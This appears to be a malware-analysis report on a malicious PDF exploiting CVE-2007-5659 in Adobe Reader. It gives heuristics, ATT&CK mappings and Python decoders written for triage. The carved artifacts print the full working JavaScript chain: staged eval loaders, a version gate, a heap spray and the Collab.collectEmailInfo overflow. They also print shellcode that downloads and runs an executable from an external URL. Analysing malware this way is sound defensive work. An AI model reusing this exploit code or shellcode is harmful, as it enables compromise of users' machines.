Verdict: MALICIOUS (risk score 266)
Malware Insights
MITRE ATT&CK: T1059.007 Command and Scripting Interpreter: JavaScript; T1203 Exploitation for Client Execution; T1105 Ingress Tool Transfer
The PDF carries an embedded JavaScript stream (/JS object 4), which is why several heuristics for PDF JavaScript actions and streams fired. The script is staged rather than delivered in one piece: the /JS object decodes a comma-separated list of numeric character codes (numeric_charcode_stage_000.js), and that stage calls syncAnnotScan() and getAnnots({nPage: 0}), reads '-'-separated hex pairs out of an annotation /Subject field, rebuilds them with String.fromCharCode and hands the result to app['eval']. The decoding is gated on app.plugIns.length, so the stage does nothing in an environment that exposes no Reader plug-ins. The next stage (legacy_pdfkit_stage_000.js) reads a different annotation's /Subject (index 0 where the first stage used index 1), decodes it as base-23 digit pairs under a four-value key derived from the digits in its own source text, and evals the output. The final stage (legacy_pdfkit_stage_001.js) takes the highest plug-in version, only continues for Reader 7.0.x or 8.0 to 8.1.1, heap-sprays blocks of 0x0c0c0c0c filler plus shellcode, and then calls Collab.collectEmailInfo() with an oversized msg argument, the CVE-2007-5659 buffer overflow. The shellcode loads urlmon and fetches a second-stage executable from http://googleinru.in/cgi-bin/etn/z002106201r0019R57191a34X6b1e33fdY6c69ca46Z0100f060, the download-and-execute behaviour of a commodity exploit-kit stager. No specific malware family was attributed: the obfuscation and the generic downloader shellcode carry no family-specific indicators.
Machine Learning
- Nyx PDF Classifier: malicious score 1.0000
Heuristics (9)
- Collab.collectEmailInfo — CVE-2007-5659 (critical; CVE exact; rule CVE_2007_5659)
  PDF JavaScript calls Collab.collectEmailInfo(). CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or a heap-sprayed message field passed to Collab.collectEmailInfo(); it is one of a series of Acrobat JavaScript API exploits. (identified after JavaScript deobfuscation)
- JavaScript action (low; 4 related findings; rule PDF_JAVASCRIPT)
  The PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Adobe Reader APSB08-13 patch-range version gate (CVE-2007-5659) (high; CVE likely; rule PDF_JS_ADOBE_APSB08_13_PATCH_GATE)
  The PDF JavaScript gates the exploit payload on (>= 8 && < 8.1.1) OR (< 7.1), the Reader 7.0.x / 8.0 to 8.1.1 window patched by Adobe APSB08-13 for the CVE-2007-5659 Collab.collectEmailInfo buffer overflow. Only kits that target that exact bug check both of those patch points; benign scripts do not. In the script the version is compared as a float, so the test reads (v >= 8 && v < 8.11) || v < 7.1, where v is the highest app.plugIns[].version.
  Matched line in script: var r_DFKNgVrTe_n = new Array();var t__Eb_N_5kx7 = 0;var H_4k_U = "";function o_P_h_21a__3_4(h_Ok_5h0Hk, RWoR_1u16){var TNE54_DB = RWoR_1u16.toString();var s5G6__P = "";for(var b_j_e6_d47413 = 0; b_j_e6_d47413 < TNE54_DB.length; b_j_e6_d47413++) {var Y6u__aO_4_r = parseInt(TNE54_DB.substr(b_j_e6_d47413, 1));if (!isNaN(Y6u__aO_4_r)) {Y6u__aO_4_r = Y6u__aO_4_r.toString(16);if (Y6u__aO_4_r.length == 1) { Y6u__aO_4_r = "0" + Y6u__aO_4_r; }else if (Y6u__aO_4_r.length != 2) { Y6u__aO_4_r = "00"; }s5G6 … (truncated; the full script is the legacy_pdfkit_stage_001.js artifact below)
- PDF JavaScript exploit cluster (critical; rule PDF_JS_EXPLOIT_CLUSTER)
  The PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behaviour.
  Matched line in script: for (var i=0; i < list.length; i++) { result += String.fromCharCode(list[i] - jump); }
- PDF exploit shellcode contains an embedded download URL (high; rule PDF_JS_SHELLCODE_DOWNLOAD_URL)
  The decoded PDF exploit shellcode contains a hardcoded http(s) URL, stored either as little-endian %uXXXX Unicode escapes or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute routine (commodity downloader behaviour rather than a specific Acrobat CVE). In this sample the URL is the tail of the %u-escaped YLOP_7_d string in legacy_pdfkit_stage_001.js (starting at %u7468%u7074%u2f3a, i.e. "http:/" read as little-endian 16-bit units), a few hundred bytes after the pushes that place "urlmon" on the stack (%u6f68%u006e%u6800%u7275%u6d6c).
- Embedded JS stream (low; rule PDF_JS)
  The PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- syncAnnotScan annotation-staging primitive (low; rule PDF_FOXIT_SYNCANNOTSCAN)
  PDF JavaScript calls syncAnnotScan(), which makes Reader finish enumerating the document's annotations; exploit-kit JavaScript calls it before getAnnots() so that payload text can be read out of annotation /Subject fields and passed to eval(). It is not a vulnerable sink itself and is rarely seen in legitimate PDFs. (identified after JavaScript deobfuscation)
- Suspicious extracted artifact (info; rule EXTRACTED_FILE_STATIC_TRIAGE)
  One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info; rule EMBEDDED_URL)
  One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://googleinru.in/cgi-bin/etn/z002106201r0019R57191a34X6b1e33fdY6c69ca46Z0100f060 (referenced by PDF JavaScript)
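The PDF_JS_SHELLCODE_DOWNLOAD_URL finding says the URL lives in the shellcode as little-endian %uXXXX escapes. The Python below, added here as an example and not code from the analyzer or from the kit, decodes the YLOP_7_d string from legacy_pdfkit_stage_001.js (listed under the extracted artifacts) the way unescape() plus the heap spray lays it out in memory, carves the download URL, reconstructs the string the shellcode builds from consecutive push imm32 instructions, and counts the ".exe" compare immediates. The escaped string is copied from the artifact; the key suffix and %u0000 terminator the kit appends at run time are left out. Function names are the example's own.

```python
"""Decode %uXXXX shellcode from a PDF exploit and carve its download URL.

Added example for this report; standard library only.
"""
from __future__ import annotations

import re
import struct

# YLOP_7_d from legacy_pdfkit_stage_001.js, copied verbatim (the kit later appends
# the o_P_h_21a__3_4() key bytes and a %u0000 terminator; omitted here).
SHELLCODE_ESCAPED = (
    "%u9050%u9050%u9050%u9050"
    "%u9090%u9090%u9090%u9090%u9090%u00e8%u0000%ueb00"
    "%ue900%u00fc%u0000%u645f%u30a1%u0000%u7800%u8b0c"
    "%u0c40%u708b%uad1c%u688b%ueb08%u8b09%u3440%u408d"
    "%u8b7c%u3c68%uf78b%u046a%ue859%u008f%u0000%uf9e2"
    "%u6f68%u006e%u6800%u7275%u6d6c%uff54%u8b16%ue8e8"
    "%u0079%u0000%ud78b%u8047%u003f%ufa75%u5747%u8047"
    "%u003f%ufa75%uef8b%u335f%u81c9%u04ec%u0001%u8b00"
    "%u51dc%u5352%u0468%u0001%uff00%u0c56%u595a%u5251"
    "%u028b%u4353%u3b80%u7500%u81fa%ufc7b%u652e%u6578"
    "%u0375%ueb83%u8908%uc703%u0443%u652e%u6578%u43c6"
    "%u0008%u8a5b%u04c1%u8830%u0045%uc033%u5050%u5753"
    "%uff50%u1056%uf883%u7500%u6a06%u5301%u56ff%u5a04"
    "%u8359%u04c2%u8041%u003a%ub475%u56ff%u5108%u8b56"
    "%u3c75%u748b%u782e%uf503%u8b56%u2076%uf503%uc933"
    "%u4149%u03ad%u33c5%u0fdb%u10be%ud63a%u0874%ucbc1"
    "%u030d%u40da%uf1eb%u1f3b%ue775%u8b5e%u245e%udd03"
    "%u8b66%u4b0c%u5e8b%u031c%u8bdd%u8b04%uc503%u5eab"
    "%uc359%uffe8%ufffe%u8eff%u0e4e%u98ec%u8afe%u7e0e"
    "%ue2d8%u3373%u8aca%u365b%u2f1a%u4870%u4849%u0045"
    "%u7468%u7074%u2f3a%u672f%u6f6f%u6c67%u6965%u726e"
    "%u2e75%u6e69%u632f%u6967%u622d%u6e69%u652f%u6e74"
    "%u7a2f%u3030%u3132%u3630%u3032%u7231%u3030%u3931"
    "%u3552%u3137%u3139%u3361%u5834%u6236%u6531%u3333"
    "%u6466%u3659%u3663%u6339%u3461%u5a36%u3130%u3030"
    "%u3066%u3036"
)

_ESC = re.compile(r"%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})")
_URL = re.compile(rb"https?://[\x21-\x7e]+")


def unescape_to_bytes(escaped: str) -> bytes:
    """Mirror JavaScript unescape(): each %uXXXX (or %XX) is one UTF-16 code unit,
    which the sprayed string stores in memory as two little-endian bytes."""
    out = bytearray()
    for wide, narrow in _ESC.findall(escaped):
        out += struct.pack("<H", int(wide or narrow, 16))
    return bytes(out)


def carve_urls(blob: bytes) -> list[str]:
    """Plain-ASCII URLs embedded in the decoded shellcode."""
    return [m.group(0).decode("ascii") for m in _URL.finditer(blob)]


def push_strings(blob: bytes, min_pushes: int = 2) -> list[str]:
    """Rebuild strings assembled by runs of `push imm32` (opcode 0x68). Each push
    contributes four bytes and the stack grows down, so the run is reversed before
    joining. Lone pushes are skipped because 0x68 also appears as data (the 'h' of
    'http') and as a ModRM byte."""
    found, i = [], 0
    while i + 5 <= len(blob):
        if blob[i] != 0x68:
            i += 1
            continue
        chunks, j = [], i
        while j + 5 <= len(blob) and blob[j] == 0x68:
            chunks.append(blob[j + 1:j + 5])
            j += 5
        if len(chunks) >= min_pushes:
            found.append(b"".join(reversed(chunks)).rstrip(b"\x00").decode("latin-1"))
            i = j
        else:
            i += 1
    return found


def summarize(escaped: str) -> dict:
    """Triage view of one %u-escaped shellcode string."""
    blob = unescape_to_bytes(escaped)
    return {
        "bytes": len(blob),
        "urls": carve_urls(blob),
        "push_strings": push_strings(blob),
        # 81 7b fc 2e 65 78 65 : cmp dword [ebx-4], ".exe" (appears twice)
        "exe_markers": blob.count(b".exe"),
    }


if __name__ == "__main__":
    for key, value in summarize(SHELLCODE_ESCAPED).items():
        print(f"{key}: {value}")
```

The two pushes `68 6f6e0000` / `68 75726c6d` become "urlmon", which is what the shellcode hands to LoadLibraryA before resolving its download routine; the URL is the first printable run after the NUL that ends the preceding data, and the ".exe" immediates are the compares used when the shellcode names its dropped file.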
Extracted artifacts (4)
Files carved from inside the sample during analysis.

Artifact: javascript_obj0004_000.js
Kind: pdf-javascript-stream
Source: PDF /JS object 4 at offset 0xE1
Size: 1940 bytes
SHA-256: be4694a17eb89a55f7eb3db389ba2bc4f102f4c7dcfc99549d848cdb7df5dfb5
Detection: ClamAV found no threats. Obfuscation or payload: likely (the carved artifact contains 1 eval/decoder/string-building token).
Preview script (first 1,000 lines of the extracted script):
sourceCode = "118,97,114,32,112,114,32,61,32,110,117,108,108,59,13,10,118,97,114,32,102,110,99,32,61,32,39,101,118,39,59,13,10,118,97,114,32,115,117,109,32,61,32,39,39,59,13,10,13,10,97,112,112,46,100,111,99,46,115,121,110,99,65,110,110,111,116,83,99,97,110,40,41,59,13,10,13,10,105,102,32,40,97,112,112,46,112,108,117,103,73,110,115,46,108,101,110,103,116,104,32,33,61,32,48,41,32,123,13,10,9,118,97,114,32,110,117,109,32,61,32,49,59,13,10,13,10,9,112,114,32,61,32,97,112,112,46,100,111,99,46,103,101,116,65,110,110,111,116,115,40,13,10,9,9,123,13,10,9,9,9,110,80,97,103,101,58,32,48,13,10,9,9,125,13,10,9,41,59,13,10,13,10,9,115,117,109,32,61,32,112,114,91,110,117,109,93,46,115,117,98,106,101,99,116,59,13,10,125,13,10,13,10,118,97,114,32,98,117,102,32,61,32,34,34,59,13,10,13,10,105,102,32,40,97,112,112,46,112,108,117,103,73,110,115,46,108,101,110,103,116,104,32,62,32,51,41,32,123,13,10,9,102,110,99,32,43,61,32,39,97,39,59,13,10,9,118,97,114,32,97,114,114,32,61,32,115,117,109,46,115,112,108,105,116,40,47,45,47,41,59,10,9,118,97,114,32,112,114,111,99,32,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,50,50,43,49,53,41,59,10,9,13,10,9,102,111,114,32,40,118,97,114,32,105,32,61,32,49,59,32,105,32,60,32,97,114,114,46,108,101,110,103,116,104,59,32,105,43,43,41,32,123,13,10,9,9,98,117,102,32,43,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,34,48,120,34,43,97,114,114,91,105,93,41,59,13,10,9,125,13,10,125,13,10,13,10,105,102,32,40,97,112,112,46,112,108,117,103,73,110,115,46,108,101,110,103,116,104,32,62,61,32,50,41,32,123,13,10,9,102,110,99,32,43,61,32,39,108,39,59,13,10,9,97,112,112,91,102,110,99,93,40,98,117,102,41,59,13,10,125,13,10";
function decrypt(str, jump){
var result = "";
var list = str.split(',');
for (var i=0; i < list.length; i++) {
result += String.fromCharCode(list[i] - jump);
}
return result;
}
Artifact: numeric_charcode_stage_000.js
Kind: deobfuscated-js
Source: numeric char-code string decoded JavaScript at offset 0xEF
Size: 505 bytes
SHA-256: 6c41320119e160dc719997b9a2efb3600ea9d7e9d7e44b4dc2125762dc9f365f
Detection: ClamAV found no threats. Obfuscation or payload: likely (the carved artifact contains 2 eval/decoder/string-building tokens).
Preview script (first 1,000 lines of the extracted script):
var pr = null;
var fnc = 'ev';
var sum = '';
app.doc.syncAnnotScan();
if (app.plugIns.length != 0) {
var num = 1;
pr = app.doc.getAnnots(
{
nPage: 0
}
);
sum = pr[num].subject;
}
var buf = "";
if (app.plugIns.length > 3) {
fnc += 'a';
var arr = sum.split(/-/);
var proc = String.fromCharCode(22+15);
for (var i = 1; i < arr.length; i++) {
buf += String.fromCharCode("0x"+arr[i]);
}
}
if (app.plugIns.length >= 2) {
fnc += 'l';
app[fnc](buf);
}
Artifact: legacy_pdfkit_stage_000.js
Kind: deobfuscated-js
Source: repeated-marker hex decoded JavaScript at offset 0x1BA8
Size: 1798 bytes
SHA-256: 5cac0ec22d63e47f789ea14600ca6d1d00a354aa70dc7b6726e34d9b0b4e7c48
Detection: ClamAV found no threats. Obfuscation or payload: likely (the carved artifact contains 1 eval/decoder/string-building token).
Preview script (first 1,000 lines of the extracted script):
function A1Di_51dNOdL(e_c2AeXfkF_1, I_j1etoa){var IR0a8_JQ__WMuvN = 4;var wW4_atrUx_PK5Ol = new Array();var D4d_I1G__bGFFo = new Array(107,256,11, 512, 106, 11, 44,40, 33);D4d_I1G__bGFFo[5] += 12;var y__S8HLU__2qe = "";try {var CW60ewNYQ = 0;if (app) {I_j1etoa = pr[CW60ewNYQ].subject;}} catch(e) {}if (!e_c2AeXfkF_1) { wW4_atrUx_PK5Ol[0] = 0;wW4_atrUx_PK5Ol[1] = wW4_atrUx_PK5Ol[0];wW4_atrUx_PK5Ol[2] = wW4_atrUx_PK5Ol[1];wW4_atrUx_PK5Ol[3] = wW4_atrUx_PK5Ol[2];var YN4__o = D4d_I1G__bGFFo[6] + 3;var b8g3W1_JoD_u_46 = YN4__o + 11;var T___Hi = A1Di_51dNOdL;var Gv_NY3R4C40d = 0;T___Hi = T___Hi.toString();for(var mQ_26f_pGR___S = 0; mQ_26f_pGR___S < T___Hi.length; mQ_26f_pGR___S++) {var Q_kNu_Shu = T___Hi.charCodeAt(mQ_26f_pGR___S);if (Q_kNu_Shu > YN4__o && Q_kNu_Shu < b8g3W1_JoD_u_46) {if (Gv_NY3R4C40d == 4) {Gv_NY3R4C40d = 0;}wW4_atrUx_PK5Ol[Gv_NY3R4C40d] += Q_kNu_Shu;if (wW4_atrUx_PK5Ol[Gv_NY3R4C40d] > D4d_I1G__bGFFo[3]) {wW4_atrUx_PK5Ol[Gv_NY3R4C40d] -= 512;}Gv_NY3R4C40d++;}}}else { wW4_atrUx_PK5Ol = e_c2AeXfkF_1;}for (var nu_L_3L = 0; nu_L_3L < 4; nu_L_3L++) {if (wW4_atrUx_PK5Ol[nu_L_3L] > D4d_I1G__bGFFo[1]) {wW4_atrUx_PK5Ol[nu_L_3L] -= D4d_I1G__bGFFo[1];}}var K__8DLa = 0;var cJc2_fp_CJr = 0;var y__HJ_86__cl0;var BPn51W3_D_8vj_b = 0;while ( K__8DLa < I_j1etoa.length ) {var d_1_O_5 = "";d_1_O_5 = I_j1etoa.substr(K__8DLa, 2);var odd_UKSX8i = parseInt(d_1_O_5, D4d_I1G__bGFFo[5]); if (cJc2_fp_CJr == 4) {cJc2_fp_CJr = 0;}odd_UKSX8i -= (BPn51W3_D_8vj_b + 2) * wW4_atrUx_PK5Ol[cJc2_fp_CJr];if (odd_UKSX8i < 0) {odd_UKSX8i -= Math.floor(odd_UKSX8i / D4d_I1G__bGFFo[1]) * D4d_I1G__bGFFo[1];}y__S8HLU__2qe += String.fromCharCode(odd_UKSX8i);{K__8DLa += 2;BPn51W3_D_8vj_b++;cJc2_fp_CJr++;}}var R_I71_1F = this;R_I71_1F["eval"](y__S8HLU__2qe);return 0;}
A1Di_51dNOdL(0);
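The three staging decoders shown above (the comma-separated char-code list in javascript_obj0004_000.js, the '-'-separated hex pairs that numeric_charcode_stage_000.js reads from pr[1].subject, and the base-23 pairs that legacy_pdfkit_stage_000.js reads from pr[0].subject under a key derived from its own source text) can be replayed offline. The Python below is an added example, not code from the report or from the kit: the annotation subjects are passed in as strings (the kit obtains them through app.doc.getAnnots({nPage: 0}), and the report does not list their contents), the decoder-source excerpt used for the key is a constructed stand-in for the full function text, and the encoder exists only to build test data.

```python
"""Replay the annotation-subject stage decoders of this sample in Python.

Added example for this report; the sample data below is constructed.
"""
from __future__ import annotations


def decode_charcode_list(codes: str, jump: int) -> str:
    """javascript_obj0004_000.js decrypt(): comma-separated numbers, each minus `jump`,
    fed to String.fromCharCode."""
    return "".join(chr((int(c) - jump) & 0xFFFF) for c in codes.split(","))


def decode_hex_subject(subject: str) -> str:
    """numeric_charcode_stage_000.js: arr = sum.split(/-/); for i >= 1 the text
    "0x" + arr[i] goes to String.fromCharCode. Text before the first '-' is ignored
    and a field that is not hex gives NaN, which fromCharCode turns into U+0000."""
    out = []
    for field in subject.split("-")[1:]:
        try:
            out.append(chr(int(field, 16) & 0xFFFF))
        except ValueError:
            out.append("\x00")
    return "".join(out)


DIGITS_B23 = "0123456789abcdefghijklm"  # alphabet of parseInt(pair, 23)


def derive_key(decoder_source: str) -> list[int]:
    """legacy_pdfkit_stage_000.js builds a 4-slot key from A1Di_51dNOdL.toString():
    only ASCII digits (char codes 48..57) are summed, round-robin over the slots,
    wrapping at 512 during the loop and at 256 afterwards. Any edit that adds,
    removes or changes a digit in the decoder body silently changes the key."""
    key, slot = [0, 0, 0, 0], 0
    for ch in decoder_source:
        code = ord(ch)
        if 47 < code < 58:
            if slot == 4:
                slot = 0
            key[slot] += code
            if key[slot] > 512:
                key[slot] -= 512
            slot += 1
    return [k - 256 if k > 256 else k for k in key]


def decode_base23_subject(subject: str, key: list[int]) -> str:
    """Two base-23 digits per byte; byte = pair - (index + 2) * key[index % 4],
    reduced mod 256 only when negative (Math.floor division in the original)."""
    out = []
    for idx, pos in enumerate(range(0, len(subject), 2)):
        val = int(subject[pos:pos + 2], 23) - (idx + 2) * key[idx % 4]
        if val < 0:
            val %= 256
        out.append(chr(val))
    return "".join(out)


def encode_base23_subject(plaintext: str, key: list[int]) -> str:
    """Inverse of decode_base23_subject, written here to build test data; the kit's
    server-side encoder is not on the page."""
    pairs = []
    for idx, ch in enumerate(plaintext):
        val = (ord(ch) + (idx + 2) * key[idx % 4]) % 256
        pairs.append(DIGITS_B23[val // 23] + DIGITS_B23[val % 23])
    return "".join(pairs)


# Constructed stand-in for the decoder source (its first statements); the real key
# comes from the complete, unmodified function body as Reader's toString() returns it.
DECODER_SOURCE_EXCERPT = (
    "function A1Di_51dNOdL(e_c2AeXfkF_1, I_j1etoa){var IR0a8_JQ__WMuvN = 4;"
    "var D4d_I1G__bGFFo = new Array(107,256,11, 512, 106, 11, 44,40, 33);"
)


def demo(payload: str = "app.alert('stage')") -> tuple[str, str]:
    """Round-trip a constructed payload, then show the tamper sensitivity: one changed
    digit in the decoder source gives a different key and garbage output."""
    key = derive_key(DECODER_SOURCE_EXCERPT)
    staged_subject = encode_base23_subject(payload, key)
    good = decode_base23_subject(staged_subject, key)
    bad_key = derive_key(DECODER_SOURCE_EXCERPT.replace("107", "108"))
    return good, decode_base23_subject(staged_subject, bad_key)


if __name__ == "__main__":
    print(decode_charcode_list("118,97,114,32,112,114", 0))
    print(decode_hex_subject("-61-70-70"))
    print(demo())
```

To recover the real stage from a sample, pull the page-0 annotation /Subject strings out of the PDF and run derive_key over the decoder text exactly as carved, without reformatting it first: the key depends on every digit in the function, including those inside identifier names.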
Artifact: legacy_pdfkit_stage_001.js
Kind: deobfuscated-js
Source: annotation-subject callee-key decoded JavaScript at offset 0x4C3
Size: 4916 bytes
SHA-256: deb1d88f551c091455022f117d94ff8a1c4728bc2854fd04a3d5677e80b3431e
Detection: ClamAV found no threats. Obfuscation or payload: likely (the carved artifact contains 5 eval/decoder/string-building tokens).
Preview script (first 1,000 lines of the extracted script):
var r_DFKNgVrTe_n = new Array();var t__Eb_N_5kx7 = 0;var H_4k_U = "";function o_P_h_21a__3_4(h_Ok_5h0Hk, RWoR_1u16){var TNE54_DB = RWoR_1u16.toString();var s5G6__P = "";for(var b_j_e6_d47413 = 0; b_j_e6_d47413 < TNE54_DB.length; b_j_e6_d47413++) {var Y6u__aO_4_r = parseInt(TNE54_DB.substr(b_j_e6_d47413, 1));if (!isNaN(Y6u__aO_4_r)) {Y6u__aO_4_r = Y6u__aO_4_r.toString(16);if (Y6u__aO_4_r.length == 1) { Y6u__aO_4_r = "0" + Y6u__aO_4_r; }else if (Y6u__aO_4_r.length != 2) { Y6u__aO_4_r = "00"; }s5G6__P = Y6u__aO_4_r + s5G6__P;}}while(s5G6__P.length < 8) { s5G6__P = "0" + s5G6__P; }var j42Qy_6_Ns1K = h_Ok_5h0Hk.toString(16);if (j42Qy_6_Ns1K.length == 1) { j42Qy_6_Ns1K = "0" + j42Qy_6_Ns1K; }else if (j42Qy_6_Ns1K.length != 2) { j42Qy_6_Ns1K = "00"; }s5G6__P = "3" + j42Qy_6_Ns1K + "P" + s5G6__P;return s5G6__P;}function x2RusW_NX_wF3(YLOP_7_d, MT3__jiw){var WjOF0QW__R = new Array("");var t7bYwljQt13_g_n = YLOP_7_d;var d7I7Ij;if ((d7I7Ij = YLOP_7_d.lastIndexOf("%u00")) != -1) {if (d7I7Ij + 6 == YLOP_7_d.length) {WjOF0QW__R[0] = YLOP_7_d.substr(d7I7Ij + 4, 2);t7bYwljQt13_g_n = YLOP_7_d.substring(0, d7I7Ij);}}d7I7Ij = 1;for (b_j_e6_d47413 = 0; b_j_e6_d47413 < MT3__jiw.length; b_j_e6_d47413++) {var D7rFQ85_l0E3V_6 = MT3__jiw.charCodeAt(b_j_e6_d47413).toString(16);if (D7rFQ85_l0E3V_6.length == 1) { D7rFQ85_l0E3V_6 = "0" + D7rFQ85_l0E3V_6; }WjOF0QW__R[d7I7Ij] = D7rFQ85_l0E3V_6;d7I7Ij++;}b_j_e6_d47413 = WjOF0QW__R[0].length ? 0 : 1;WjOF0QW__R[d7I7Ij] = "00";WjOF0QW__R[d7I7Ij + 1] = "00";d7I7Ij += 2;if ((WjOF0QW__R.length - b_j_e6_d47413) % 2) {WjOF0QW__R[d7I7Ij] = "00";}while(b_j_e6_d47413 < WjOF0QW__R.length) {t7bYwljQt13_g_n += "%u" + WjOF0QW__R[b_j_e6_d47413 + 1] + WjOF0QW__R[b_j_e6_d47413];b_j_e6_d47413 += 2;}t7bYwljQt13_g_n += "%u0000";return t7bYwljQt13_g_n;}function c_1_C_6SI10t_i(V1_gljT6, MPM_up){while (V1_gljT6.length*2<MPM_up) {V1_gljT6 += V1_gljT6;}V1_gljT6 = V1_gljT6.substring(0,MPM_up/2);return V1_gljT6;}function DkT3__231(AU__01J_36, q__pb0W4_us4, p0iis5x){var BWH_HC__Fg_82 = 0x0c0c0c0c;var V1_gljT6 = unescape(q__pb0W4_us4);var MT3__jiw = o_P_h_21a__3_4(AU__01J_36, p0iis5x);var g_ooCdB = unescape("%u9090%u9090%u9090%u21eb%ub859%u9050%u9050%u6a51%u33ff%u64db%u2389%u026a%u8b59%uf3fb%u75af%uff07%u66e7%ucb81%u0fff%ueb43%ue8ed%uffda%uffff%u0c6a%u8b59%u0c04%ub8b1%u0483%u0608%u8358%u10c4%u3350%uc3c0");var YLOP_7_d = "%u9050%u9050%u9050%u9050" + "%u9090%u9090%u9090%u9090%u9090%u00e8%u0000%ueb00%ue900%u00fc%u0000%u645f%u30a1%u0000%u7800%u8b0c%u0c40%u708b%uad1c%u688b%ueb08%u8b09%u3440%u408d%u8b7c%u3c68%uf78b%u046a%ue859%u008f%u0000%uf9e2%u6f68%u006e%u6800%u7275%u6d6c%uff54%u8b16%ue8e8%u0079%u0000%ud78b%u8047%u003f%ufa75%u5747%u8047%u003f%ufa75%uef8b%u335f%u81c9%u04ec%u0001%u8b00%u51dc%u5352%u0468%u0001%uff00%u0c56%u595a%u5251%u028b%u4353%u3b80%u7500%u81fa%ufc7b%u652e%u6578%u0375%ueb83%u8908%uc703%u0443%u652e%u6578%u43c6%u0008%u8a5b%u04c1%u8830%u0045%uc033%u5050%u5753%uff50%u1056%uf883%u7500%u6a06%u5301%u56ff%u5a04%u8359%u04c2%u8041%u003a%ub475%u56ff%u5108%u8b56%u3c75%u748b%u782e%uf503%u8b56%u2076%uf503%uc933%u4149%u03ad%u33c5%u0fdb%u10be%ud63a%u0874%ucbc1%u030d%u40da%uf1eb%u1f3b%ue775%u8b5e%u245e%udd03%u8b66%u4b0c%u5e8b%u031c%u8bdd%u8b04%uc503%u5eab%uc359%uffe8%ufffe%u8eff%u0e4e%u98ec%u8afe%u7e0e%ue2d8%u3373%u8aca%u365b%u2f1a%u4870%u4849%u0045%u7468%u7074%u2f3a%u672f%u6f6f%u6c67%u6965%u726e%u2e75%u6e69%u632f%u6967%u622d%u6e69%u652f%u6e74%u7a2f%u3030%u3132%u3630%u3032%u7231%u3030%u3931%u3552%u3137%u3139%u3361%u5834%u6236%u6531%u3333%u6466%u3659%u3663%u6339%u3461%u5a36%u3130%u3030%u3066%u3036";app.VFFLh_2c8Q = unescape(x2RusW_NX_wF3(YLOP_7_d, MT3__jiw));var L_N__K5_v0p = 0x400000;var dgJ448f_Wu__d2 = g_ooCdB.length * 2;var MPM_up = L_N__K5_v0p - (dgJ448f_Wu__d2+0x38);V1_gljT6 = c_1_C_6SI10t_i(V1_gljT6, MPM_up);var H__Q5_6L = (BWH_HC__Fg_82 - 0x400000)/L_N__K5_v0p;for (var Bgo___o = 0; Bgo___o < H__Q5_6L; Bgo___o++) {r_DFKNgVrTe_n[Bgo___o] = V1_gljT6 + g_ooCdB;}}function ex5_CW2_21_dg(){var uCPb13_c_Yn_y6F = "";for (b_j_e6_d47413 = 0; b_j_e6_d47413 < 12; b_j_e6_d47413++) {uCPb13_c_Yn_y6F += unescape("%u0c0c%u0c0c");}var BH2__g_K = "";for (b_j_e6_d47413 = 0; b_j_e6_d47413 < 750; b_j_e6_d47413++) {BH2__g_K += uCPb13_c_Yn_y6F;}this.collabStore = Collab.collectEmailInfo({subj: "", msg: BH2__g_K});app.clearTimeOut(t__Eb_N_5kx7);}function r3w67n(sb0_uX_7_K0){var kmP8tq_X_M_1P = t__Eb_N_5kx7;if ((sb0_uX_7_K0 >= 8 && sb0_uX_7_K0 < 8.11) || sb0_uX_7_K0 < 7.1) {DkT3__231(23, "%u0c0c%u0c0c", sb0_uX_7_K0);ex5_CW2_21_dg();}if (kmP8tq_X_M_1P) {app.clearTimeOut(kmP8tq_X_M_1P);}}var p0iis5x = 0;var P6_1P2FdJ6_X = app.plugIns;for (var FsO_vk = 0; FsO_vk < P6_1P2FdJ6_X.length; FsO_vk++) {var V_a5uBN8TRt = P6_1P2FdJ6_X[FsO_vk].version;if (V_a5uBN8TRt > p0iis5x) { p0iis5x = V_a5uBN8TRt; }}if (app.viewerVersion == 9.103 && p0iis5x < 9.13) {p0iis5x = 9.13;}app.E_RE_V0_4t = r3w67n;t__Eb_N_5kx7 = app.setTimeOut("app.E_RE_V0_4t(" + p0iis5x.toString() + ")", 50);